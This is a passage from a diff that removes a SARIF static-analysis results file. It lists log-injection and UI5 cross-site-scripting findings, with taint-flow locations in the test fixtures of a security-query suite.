- }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 7, - "startColumn" : 18, - "endColumn" : 41 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "be9a18716e55d497:1", - "primaryLocationStartColumnFingerprint" : "13" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 6, - "startColumn" : 17, - "endColumn" : 51 - } - }, - "message" : { - "text" : "jQuery. ... param\")" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 6, - "startColumn" : 9, - "endColumn" : 51 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 7, - "startColumn" : 34, - "endColumn" : 39 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 7, - "startColumn" : 18, - "endColumn" : 41 - } - }, - "message" : { - "text" : "`[INFO] ... 
value}`" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 6, - "startColumn" : 17, - "endColumn" : 51 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/log-injection", - "rule" : { - "id" : "js/log-injection", - "index" : 92, - "toolComponent" : { - "index" : 3 - } - }, - "message" : { - "text" : "Log entry depends on a [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 15, - "startColumn" : 18, - "endColumn" : 41 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "be9a18716e55d497:2", - "primaryLocationStartColumnFingerprint" : "13" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 13, - "startColumn" : 23, - "endColumn" : 30 - } - }, - "message" : { - "text" : "req.url" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 13, - "startColumn" : 13, - "endColumn" : 37 - } - }, - "message" : { - "text" : "url.par ... 
, true)" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 13, - "startColumn" : 9, - "endColumn" : 37 - } - }, - "message" : { - "text" : "q" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 14, - "startColumn" : 17, - "endColumn" : 18 - } - }, - "message" : { - "text" : "q" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 14, - "startColumn" : 17, - "endColumn" : 24 - } - }, - "message" : { - "text" : "q.query" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 14, - "startColumn" : 17, - "endColumn" : 33 - } - }, - "message" : { - "text" : "q.query.username" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 14, - "startColumn" : 9, - "endColumn" : 33 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : 
"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 15, - "startColumn" : 34, - "endColumn" : 39 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 15, - "startColumn" : 18, - "endColumn" : 41 - } - }, - "message" : { - "text" : "`[INFO] ... value}`" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 13, - "startColumn" : 23, - "endColumn" : 30 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/log-injection", - "rule" : { - "id" : "js/log-injection", - "index" : 92, - "toolComponent" : { - "index" : 3 - } - }, - "message" : { - "text" : "Log entry depends on a [user-provided value](1)." 
- }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 24, - "startColumn" : 18, - "endColumn" : 42 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "e197b363f9dc3962:1", - "primaryLocationStartColumnFingerprint" : "13" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 21, - "startColumn" : 23, - "endColumn" : 30 - } - }, - "message" : { - "text" : "req.url" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 21, - "startColumn" : 13, - "endColumn" : 37 - } - }, - "message" : { - "text" : "url.par ... 
, true)" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 21, - "startColumn" : 9, - "endColumn" : 37 - } - }, - "message" : { - "text" : "q" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 22, - "startColumn" : 17, - "endColumn" : 18 - } - }, - "message" : { - "text" : "q" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 22, - "startColumn" : 17, - "endColumn" : 24 - } - }, - "message" : { - "text" : "q.query" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 22, - "startColumn" : 17, - "endColumn" : 33 - } - }, - "message" : { - "text" : "q.query.username" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 22, - "startColumn" : 9, - "endColumn" : 33 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : 
"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 23, - "startColumn" : 39, - "endColumn" : 44 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 23, - "startColumn" : 18, - "endColumn" : 45 - } - }, - "message" : { - "text" : "jQuery. ... (value)" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 23, - "startColumn" : 9, - "endColumn" : 45 - } - }, - "message" : { - "text" : "value1" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 24, - "startColumn" : 34, - "endColumn" : 40 - } - }, - "message" : { - "text" : "value1" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 24, - "startColumn" : 18, - "endColumn" : 42 - } - }, - "message" : { - "text" : "`[INFO] ... 
alue1}`" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 21, - "startColumn" : 23, - "endColumn" : 30 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/log-injection", - "rule" : { - "id" : "js/log-injection", - "index" : 92, - "toolComponent" : { - "index" : 3 - } - }, - "message" : { - "text" : "Log entry depends on a [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/heuristic-models/tests/Sources/test.js", - "uriBaseId" : "%SRCROOT%", - "index" : 4 - }, - "region" : { - "startLine" : 5, - "startColumn" : 17, - "endColumn" : 33 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "45280b24f3d81287:1", - "primaryLocationStartColumnFingerprint" : "12" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/heuristic-models/tests/Sources/test.js", - "uriBaseId" : "%SRCROOT%", - "index" : 4 - }, - "region" : { - "startLine" : 5, - "startColumn" : 17, - "endColumn" : 33 - } - }, - "message" : { - "text" : "req.responseText" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/heuristic-models/tests/Sources/test.js", - "uriBaseId" : "%SRCROOT%", - "index" : 4 - }, - "region" : { - "startLine" : 5, - "startColumn" : 17, - "endColumn" : 33 - } - }, - "message" : { - "text" : "req.responseText" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/heuristic-models/tests/Sources/test.js", - "uriBaseId" : "%SRCROOT%", - "index" : 4 - }, - "region" : { - 
"startLine" : 5, - "startColumn" : 17, - "endColumn" : 33 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/ui5-xss", - "rule" : { - "id" : "js/ui5-xss", - "index" : 0, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "XSS vulnerability due to [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 5, - "startColumn" : 27, - "endColumn" : 32 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "92dbc37bdafc7694:1", - "primaryLocationStartColumnFingerprint" : "22" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 3, - "startColumn" : 17, - "endColumn" : 51 - } - }, - "message" : { - "text" : "jQuery. ... 
param\")" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 3, - "startColumn" : 9, - "endColumn" : 51 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 5, - "startColumn" : 27, - "endColumn" : 32 - } - }, - "message" : { - "text" : "value" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 3, - "startColumn" : 17, - "endColumn" : 51 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/ui5-xss", - "rule" : { - "id" : "js/ui5-xss", - "index" : 0, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "XSS vulnerability due to [user-provided value](1)." 
- }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 12, - "startColumn" : 27, - "endColumn" : 32 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "faa1832c387d2ee5:1", - "primaryLocationStartColumnFingerprint" : "22" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 10, - "startColumn" : 17, - "endColumn" : 41 - } - }, - "message" : { - "text" : "documen ... .search" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 10, - "startColumn" : 9, - "endColumn" : 41 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 12, - "startColumn" : 27, - "endColumn" : 32 - } - }, - "message" : { - "text" : "value" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 10, - "startColumn" : 17, - "endColumn" : 41 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/ui5-xss", - "rule" : { - "id" : 
"js/ui5-xss", - "index" : 0, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "XSS vulnerability due to [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 20, - "startColumn" : 27, - "endColumn" : 33 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "8291f53a2e235d15:1", - "primaryLocationStartColumnFingerprint" : "22" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 17, - "startColumn" : 17, - "endColumn" : 41 - } - }, - "message" : { - "text" : "documen ... .search" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 17, - "startColumn" : 9, - "endColumn" : 41 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 18, - "startColumn" : 39, - "endColumn" : 44 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 18, - "startColumn" : 18, - "endColumn" : 45 - } - }, - 
"message" : { - "text" : "jQuery. ... (value)" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 18, - "startColumn" : 9, - "endColumn" : 45 - } - }, - "message" : { - "text" : "value1" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 20, - "startColumn" : 27, - "endColumn" : 33 - } - }, - "message" : { - "text" : "value1" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 0 - }, - "region" : { - "startLine" : 17, - "startColumn" : 17, - "endColumn" : 41 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/ui5-xss", - "rule" : { - "id" : "js/ui5-xss", - "index" : 0, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "XSS vulnerability due to [user-provided value](1)." 
- }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controls/Book.js", - "uriBaseId" : "%SRCROOT%", - "index" : 243 - }, - "region" : { - "startLine" : 132, - "startColumn" : 7, - "endLine" : 134, - "endColumn" : 16 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "63ace7b071639814:1", - "primaryLocationStartColumnFingerprint" : "0" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controller/App.Controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 242 - }, - "region" : { - "startLine" : 23, - "startColumn" : 25, - "endColumn" : 48 - } - }, - "message" : { - "text" : "oSearch ... Value()" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controller/App.Controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 242 - }, - "region" : { - "startLine" : 23, - "startColumn" : 11, - "endColumn" : 48 - } - }, - "message" : { - "text" : "searchValue" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controller/App.Controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 242 - }, - "region" : { - "startLine" : 27, - "startColumn" : 34, - "endColumn" : 45 - } - }, - "message" : { - "text" : "searchValue" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controls/Book.js", - "uriBaseId" : "%SRCROOT%", - "index" : 243 - }, - "region" : { - "startLine" : 17, - "startColumn" : 13, - "endColumn" : 31 - } - }, - "message" : { - "text" : "{ type: \"string\" }" 
- } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controls/Book.js", - "uriBaseId" : "%SRCROOT%", - "index" : 243 - }, - "region" : { - "startLine" : 133, - "startColumn" : 8, - "endColumn" : 27 - } - }, - "message" : { - "text" : "oControl.getTitle()" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controls/Book.js", - "uriBaseId" : "%SRCROOT%", - "index" : 243 - }, - "region" : { - "startLine" : 132, - "startColumn" : 7, - "endLine" : 134, - "endColumn" : 16 - } - }, - "message" : { - "text" : "\"
T ...
\"" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controller/App.Controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 242 - }, - "region" : { - "startLine" : 23, - "startColumn" : 25, - "endColumn" : 48 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/ui5-xss", - "rule" : { - "id" : "js/ui5-xss", - "index" : 0, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "XSS vulnerability due to [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 266 - }, - "region" : { - "startLine" : 14, - "startColumn" : 23, - "endColumn" : 41 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "fc87b07640e9d85:1", - "primaryLocationStartColumnFingerprint" : "10" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 271 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 267 - }, - "region" : { - "startLine" : 9, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 266 - }, - "region" : { - "startLine" : 7, - "startColumn" : 23, - "endColumn" : 41 - } - }, - "message" : { - "text" : "{ type: \"string\" }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 266 - }, - "region" : { - "startLine" : 14, - "startColumn" : 23, - "endColumn" : 41 - } - }, - "message" : { - "text" : "oControl.getText()" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 271 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - }, { - "ruleId" : "js/ui5-xss", - "rule" : { - "id" : "js/ui5-xss", - "index" : 0, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "XSS vulnerability due to [user-provided value](1)." 
- }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 275 - }, - "region" : { - "startLine" : 14, - "startColumn" : 32, - "endColumn" : 50 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "352d5eac262ae765:1", - "primaryLocationStartColumnFingerprint" : "15" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 280 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 276 - }, - "region" : { - "startLine" : 9, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 275 - }, - "region" : { - "startLine" : 7, - "startColumn" : 23, - "endColumn" : 41 - } - }, - "message" : { - "text" : "{ type: \"string\" }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : 